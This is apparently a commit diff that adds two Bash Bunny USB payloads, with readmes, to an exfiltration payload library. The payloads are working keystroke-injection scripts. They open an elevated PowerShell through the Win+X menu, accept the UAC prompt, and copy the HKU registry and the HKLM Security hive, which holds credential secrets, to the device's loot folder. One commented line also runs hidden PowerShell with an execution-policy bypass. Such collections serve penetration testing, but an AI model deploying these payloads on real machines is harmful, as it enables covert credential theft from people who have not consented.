Added new payload WIN_PoSH_HKU_RegBackUp (#424)

* Add files via upload * Update readme.md * Update payload.txt * Update readme.md * Update readme.md * Update readme.md * Update readme.md * Update readme.md * Add files via upload * Update readme.md * Update readme.md * Add Payload WIN_PoSH_HKU_RegBackUp * Update readme.md * Update payload.txt * Change for admin shell * Update readme.md * Update payload.txt * Update payload.txt * Update readme.md * Added payload WIN_PoSH_SaveSecurityHive Added new payload to exfiltration that saves the HKLM security hive to the bunny
2025-10-29 16:58:25 +00:00 · 2020-12-14 23:53:42 +00:00
parent b8a329232a
commit 3904f165d9
4 changed files with 101 additions and 0 deletions
--- a/payloads/library/exfiltration/WIN_PoSH_HKU_RegBackUp/payload.txt
+++ b/payloads/library/exfiltration/WIN_PoSH_HKU_RegBackUp/payload.txt
@@ -0,0 +1,23 @@
 # Title:       	Backup User registry (HKU)
 # Description:  Uses PowerShell, to run Reg.exe to export the HKU entry to a file on the bunny  
 # Author:       Cribbit
 # Version:      1.1
 # Category:     Exfiltration
 # Target:       Windows 10 (Creators Update) (Powershell)
 # Attackmodes:	HID & STORAGE	
 # Config: 	Usesful root keys [ HKLM | HKCU | HKCR | HKU | HKCC ]
 LED SETUP
 ATTACKMODE HID STORAGE
 LED ATTACK
 Q DELAY 200
 REM RUN WIN powershell -NoP -NonI -W Hidden -Exec Bypass ".(Reg EXPORT HKU ((gwmi win32_volume -f 'label=''BashBunny''').Name+'loot\\keys.reg'))"
 Q GUI x
 Q STRING a
 Q DELAY 100
 Q ALT y
 Q DELAY 100
 Q STRING "Reg EXPORT HKU ((gwmi win32_volume -f 'label=''BashBunny''').Name+'loot\\keys.reg') /y"
 Q ENTER 
 LED FINISH
--- a/payloads/library/exfiltration/WIN_PoSH_HKU_RegBackUp/readme.md
+++ b/payloads/library/exfiltration/WIN_PoSH_HKU_RegBackUp/readme.md
@@ -0,0 +1,30 @@
 # Backup User registry (HKU)
 * Author: Cribbit 
 * Version: 1.1
 * Target: Windows 10 (Creators Update) (Powershell)
 * Category: Exfiltration
 * Attackmode: HID & STORAGE
 ## Change Log
 | Version | Changes                        |
 | ------- | -------------------------------|
 | 1.0     | Initial release                |
 | 1.1     | Use Admin Shell (for all keys) |
 ## Description
 Uses PowerShell, to run Reg.exe to export the HKU entry to a file on the bunny.
 ## Configuration
 RootKeys: [ HKLM | HKCU | HKCR | HKU | HKCC ]
 Usesful Reg.exe export parameters:
 * /y       Force overwriting the existing file without prompt.
 * /reg:32  Specifies the key should be accessed using the 32-bit registry view.
 * /reg:64  Specifies the key should be accessed using the 64-bit registry view.
 ## Colors
 | Status    | Color                         | Description                                      |
 | --------- | ------------------------------| ------------------------------------------------ |
 | SETUP     | Magenta solid                 | Setting attack mode                              | 
 | ATTACK    | Yellow single blink           | Injecting Powershell script                      | 
 | FINISH    | Green blink followed by SOLID | Script is finished                               |
--- a/payloads/library/exfiltration/WIN_PoSH_SaveSecurityHive/payload.txt
+++ b/payloads/library/exfiltration/WIN_PoSH_SaveSecurityHive/payload.txt
@@ -0,0 +1,22 @@
 # Title:       	Save security hive
 # Description:  Uses PowerShell, to run Reg.exe to save security hive to the bunny.  
 # Author:       Cribbit
 # Version:      1.0
 # Category:     Exfiltration
 # Target:       Windows 10 Creators Update (Powershell)
 # Attackmodes:  HID & STORAGE
 # Props:        Ben Clark (RTFM)	
 LED SETUP
 ATTACKMODE HID STORAGE
 LED ATTACK
 Q DELAY 200
 Q GUI x
 Q STRING a
 sleep 2
 Q ALT y
 sleep 2
 Q STRING "Reg SAVE HKLM\Security ((gwmi win32_volume -f 'label=''BashBunny''').Name+'loot\\'+\$env:computername+'_security.hive') /y"
 Q ENTER 
 LED FINISH
--- a/payloads/library/exfiltration/WIN_PoSH_SaveSecurityHive/readme.md
+++ b/payloads/library/exfiltration/WIN_PoSH_SaveSecurityHive/readme.md
@@ -0,0 +1,26 @@
 # Save security hive
 * Author: Cribbit 
 * Version: 1.0
 * Target: Windows 10 (Creators Update) (Powershell)
 * Category: Exfiltration
 * Attackmode: HID & STORAGE
 * Props: Ben Clark (RTFM)
 ## Change Log
 | Version | Changes                       |
 | ------- | ------------------------------|
 | 1.0     | Initial release               |
 ## Description
 Uses PowerShell, to run Reg.exe to save security hive to the bunny.
 ## Configuration
 Usesful Reg.exe save parameters:
 * /y       Force overwriting the existing file without prompt.
 * /reg:32  Specifies the key should be accessed using the 32-bit registry view.
 * /reg:64  Specifies the key should be accessed using the 64-bit registry view.
 ## Colors
 | Status    | Color                         | Description                                      |
 | --------- | ------------------------------| ------------------------------------------------ |
 | SETUP     | Magenta solid                 | Setting attack mode                              | 
 | ATTACK    | Yellow single blink           | Injecting Powershell script                      | 
 | FINISH    | Green blink followed by SOLID | Script is finished                               |